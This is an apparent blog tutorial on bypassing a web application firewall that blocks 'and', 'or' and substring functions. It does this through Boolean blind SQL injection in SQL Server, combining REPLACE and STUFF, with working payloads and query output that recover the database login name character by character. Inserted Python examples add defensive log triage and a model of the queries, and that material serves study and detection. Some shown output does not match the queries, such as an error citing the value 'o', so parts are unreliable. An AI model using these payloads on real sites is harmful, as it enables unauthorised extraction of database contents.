Introduction to SQL Server Injection - Tutorial Boy

Introduction to SQL Server Injection



Introduction


This article describes an unusual WAF bypass encountered during an engagement. The approach was to read the manuals of the various databases and then search for less common functions.

WAFs usually intercept the well-known functions. Most people get around a WAF by poking at the filter until they find a gap in front of it, so instead we read the manual for little-used functions and methods and combine them to get past the filter.

SQL Server Smart Functions

The problem came up on a company project: the target had an injection point, but a filter blocked the following keywords separately:
and, or, left, right, substring
The injection point also reported no errors, so only Boolean blind injection could be used to extract data slowly.

There are two difficulties in extracting data here:
  • The site filters and and or
  • The site filters the commonly used string truncation functions left, right and substring
The first difficulty can be handled with the arithmetic operators +, -, * and /, which join the injected expression to the original query.

The second difficulty is harder to solve, but there is still a way: the REPLACE function combined with the STUFF function forms an alternative string interception function.
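The filter described above is a keyword blocklist, and the rest of the article shows why that is not enough for a parameter that should only ever be an integer. The following Python is an added example, not code from the article: it models the blocklist (the five keywords named above), puts positive validation of the id parameter beside it, and runs both over a few constructed access-log lines that reuse the article's request shape (the hostname, path and log format are assumptions). The structural check flags an integer parameter that carries a function call or a quote at all, which catches the REPLACE(STUFF(...)) payloads even though they contain none of the blocked words.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Model of the keyword blocklist from the article (constructed, not a real WAF rule set).
BLOCKED_WORDS = re.compile(r"\b(and|or|left|right|substring)\b", re.IGNORECASE)

# Any function call inside a value that should be a plain number.
FUNC_CALL = re.compile(r"[A-Za-z_]\w*\s*\(")


def keyword_waf_allows(value: str) -> bool:
    """True when the keyword blocklist lets the parameter value through."""
    return BLOCKED_WORDS.search(value) is None


def strict_id_allows(value: str) -> bool:
    """Positive validation for an integer id: only a plain decimal number passes."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def suspicious_id(value: str) -> bool:
    """Structural signal: an integer id never legitimately carries a call or a quote."""
    return bool(FUNC_CALL.search(value)) or "'" in value


def id_from_request_line(line: str):
    """Pull the decoded id parameter out of a combined-format access-log line."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
    if not m:
        return None
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    return params.get("id", [None])[0]


def classify(line: str) -> dict:
    raw = id_from_request_line(line)
    if raw is None:
        return {"id": None}
    return {
        "id": raw,
        "keyword_waf_allows": keyword_waf_allows(raw),
        "strict_validation_allows": strict_id_allows(raw),
        "suspicious": suspicious_id(raw),
    }


def triage(lines):
    """Ids that slipped past the keyword blocklist but fail positive validation."""
    return [c["id"] for c in map(classify, lines)
            if c["id"] is not None
            and c["keyword_waf_allows"] and not c["strict_validation_allows"]]


# Constructed log lines; the payloads are the ones shown later in the article.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /xxx/list.jsp?id=2 HTTP/1.1" 200',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /xxx/list.jsp?id=2%20or%201=1 HTTP/1.1" 403',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] '
    '"GET /xxx/list.jsp?id=2-REPLACE(STUFF(system_user,2,0,%27%27),system_user,0) HTTP/1.1" 200',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] '
    '"GET /xxx/list.jsp?id=2-REPLACE(STUFF(system_user,1,1,%27%27),%27a%27,0) HTTP/1.1" 200',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line))
    print("slipped past the blocklist:", triage(SAMPLE_LOG))
```

The keyword blocklist stops the `or` request and nothing else; positive validation rejects every non-numeric value without needing to know which functions exist, which is the check to enforce in the application before the value ever reaches the query.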

Related Functions

Replace Function

Definition: REPLACE() returns the string after replacing all occurrences of the specified string value in the original string with another string value.

Plain form: REPLACE(original string, string to find, string to replace with)
Syntax: REPLACE(string_expression, string_pattern, string_replacement)

Simply put, every occurrence of string_pattern in string_expression is replaced with string_replacement.

Example

-- replace every 'a' with '1'
1> select REPLACE('abcdef', 'a', '1');
2> go
+-------+
| |
+-------+
| 1bcdef |
+-------+
(1 rows affected)

-- replace every 'b' with '1'
1> select REPLACE('abcdef', 'b', '1');
2> go
+-------+
| |
+-------+
| a1cdef |
+-------+
(1 rows affected)

-- replace every 'ab' with '1'
1> select REPLACE('abcdef', 'ab', '1');
2> go
+-------+
| |
+-------+
| 1cdef |
+-------+
(1 rows affected)

STUFF Function

STUFF is not a string interception function, but we can use it as one.

STUFF inserts a string into another string.

It deletes the specified number of characters from the first string, starting at the start position;

then it inserts the second string into the first string at that start position.

STUFF('data to be modified', (int) 'start position', (int) 'number of characters deleted', 'content to insert')

Example

sql server > select STUFF('abcde',1,0,'');
+--------------------------------+
|  field1                        |
+--------------------------------+
| abcde                          |
+--------------------------------+
1 row in set (0.00 sec)

Example

After looking at the examples of the two functions above, you can probably guess what I will do here:
combine them to replace the string interception function.

Because the screenshots involve a customer project, I cannot publish the real ones here and can only reproduce the steps locally.
  • injection parameter: id

Example: system_user

-- data to extract
1> select system_user;
2> go
+----+
| |
+----+
| sa |
+----+
(1 rows affected)
-- test data
1> select * from users;
2> go
+----+-------------+------------+
| id | username | password |
+----+-------------+------------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
| 3 | testaa | 4444 |
+----+-------------+------------+
(3 rows affected)

Assume the request is: https://xxx.test.in/xxx/xxx/list.jsp?id=2
The returned data is as follows:
1> select * from users where id=2;
2> go
+-----+--------------+-----------+
| id  |   username   |  password |
+-----+--------------+-----------+
| 2   | test-user-02 |   234567  |
+-----+--------------+-----------+
(1 rows affected)
Now start injecting.

Whenever a guess makes the server return the id=2 row, that guess was correct.

Obtain the Length of system_user

The length of a value can be obtained this way: STUFF returns NULL when the start position lies beyond the end of the string, and NULL arithmetic matches no row.

Lower the start position until the id=2 row comes back; that start position is the length of system_user.

Incorrect guess

1> select * from users where id=2-REPLACE(STUFF(system_user,10,0,''),system_user,0);
2> go
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
+----+----------+-----------+
(0 rows affected)

No row is returned, so system_user is shorter than 10 characters. The same happens with a start position of 3:

1> select * from users where id=2-REPLACE(STUFF(system_user,3,0,''),system_user,0);
2> go
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
+----+----------+-----------+
(0 rows affected)

Correct guess

1> select * from users where id=2-REPLACE(STUFF(system_user,2,0,''),system_user,0);
2> go
+--------+------------+-----------+
| id     | username   | password |
+--------+------------+-----------+
| 2      | test-user-02 | 234567   |
+--------+------------+-----------+
(1 rows affected)

The id=2 row is returned, so the length of system_user is 2.

Second Character of system_user

Incorrect guess

1> select * from users where id=2-REPLACE(STUFF(system_user,1,1,''),'b',0);
2> go
22018 - [SQL Server]Failed converting nvarchar value 'a' to data type int.

The database raises a conversion error, which means the second character of system_user is not 'b'.

Correct guess

1> select * from users where id=2-REPLACE(STUFF(system_user,1,1,''),'a',0);
2> go
+-----+--------------+-----------+
| id  |   username   |  password |
+-----+--------------+-----------+
| 2   | test-user-02 |   234567  |
+-----+--------------+-----------+
(1 rows affected)
The id=2 row is displayed normally, indicating that the second character of system_user is 'a'.

First Character of system_user

Incorrect guess

1> select * from users where id=2-REPLACE(STUFF(system_user,1,0,''),'fa',0);
2> go
22018 - [SQL Server]Failed converting nvarchar value 'o' to data type int.

The database raises a conversion error, which means the first character of system_user is not 'f'.

Correct guess

1> select * from users where id=2-REPLACE(STUFF(system_user,1,0,''),'sa',0)
2> go
+-----+--------------+-----------+
| id  |   username   |  password |
+-----+--------------+-----------+
| 2   | test-user-02 |   234567  |
+-----+--------------+-----------+
(1 rows affected)
The id=2 row is displayed normally, indicating that the first character of system_user is 's'.

So system_user = sa.
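The queries above produce exactly three observable outcomes: the id=2 row, no row, or a conversion error. The Python below is an added example, not code from the article; it models the documented behaviour of STUFF and REPLACE and evaluates the predicate of each query shown above for a given SYSTEM_USER value, so that the three outcomes and two caveats are visible. It assumes the documented STUFF rule that an out-of-range start position or a negative length yields NULL, and it assumes a case-insensitive collation for REPLACE (typical of SQL Server defaults, stated here as an assumption), which is why the technique cannot tell 'a' from 'A'. From the defender's side, the "conversion error" outcome is the trace worth alerting on: repeated "Failed converting nvarchar value ... to data type int" errors raised against a parameter that should only ever be an integer.

```python
import re


def stuff(s, start, length, replace_with):
    """Model of T-SQL STUFF: delete `length` characters of `s` from 1-based `start`,
    then insert `replace_with` there. Returns None (SQL NULL) when start is 0,
    negative or past the end of the string, or when length is negative."""
    if s is None or start <= 0 or start > len(s) or length < 0:
        return None
    return s[:start - 1] + replace_with + s[start - 1 + length:]


def replace(s, pattern, replacement, case_insensitive=True):
    """Model of T-SQL REPLACE. NULL in, NULL out; an empty pattern leaves the
    string unchanged; matching follows the collation (case-insensitive assumed)."""
    if s is None or pattern is None or replacement is None:
        return None
    if pattern == "":
        return s
    if case_insensitive:
        return re.sub(re.escape(pattern), lambda _m: replacement, s, flags=re.IGNORECASE)
    return s.replace(pattern, replacement)


def where_id_outcome(id_value, expr):
    """What the application sees for `WHERE id = <id_value> - <expr>` when expr is
    a string: NULL arithmetic matches nothing ('no row'), a non-numeric string
    fails the implicit int conversion ('conversion error'), and a numeric string
    is subtracted, so only '0' brings the original row back ('row')."""
    if expr is None:
        return "no row"
    try:
        n = int(expr)
    except ValueError:
        return "conversion error"
    return "row" if id_value - n == id_value else "no row"


def article_queries(system_user):
    """Evaluate the predicates of the six queries shown in the article against a
    given SYSTEM_USER value (constructed input, 'sa' in the article's test)."""
    ln10 = replace(stuff(system_user, 10, 0, ""), system_user, "0")
    ln2 = replace(stuff(system_user, 2, 0, ""), system_user, "0")
    second_b = replace(stuff(system_user, 1, 1, ""), "b", "0")
    second_a = replace(stuff(system_user, 1, 1, ""), "a", "0")
    first_fa = replace(stuff(system_user, 1, 0, ""), "fa", "0")
    first_sa = replace(stuff(system_user, 1, 0, ""), "sa", "0")
    return {
        "length 10?": where_id_outcome(2, ln10),
        "length 2?": where_id_outcome(2, ln2),
        "second char 'b'?": where_id_outcome(2, second_b),
        "second char 'a'?": where_id_outcome(2, second_a),
        "first char 'f'?": where_id_outcome(2, first_fa),
        "first char 's'?": where_id_outcome(2, first_sa),
    }


if __name__ == "__main__":
    for query, outcome in article_queries("sa").items():
        print(f"{query:20} -> {outcome}")
```

Two caveats fall out of the model. A wrong guess against a character that happens to be a digit yields "no row" instead of an error, because the leftover string still converts to int; and under a case-insensitive collation REPLACE treats 'a' and 'A' alike, so the recovered value's case is not trustworthy. Both matter when reconstructing what an attacker actually learned from a set of logged requests.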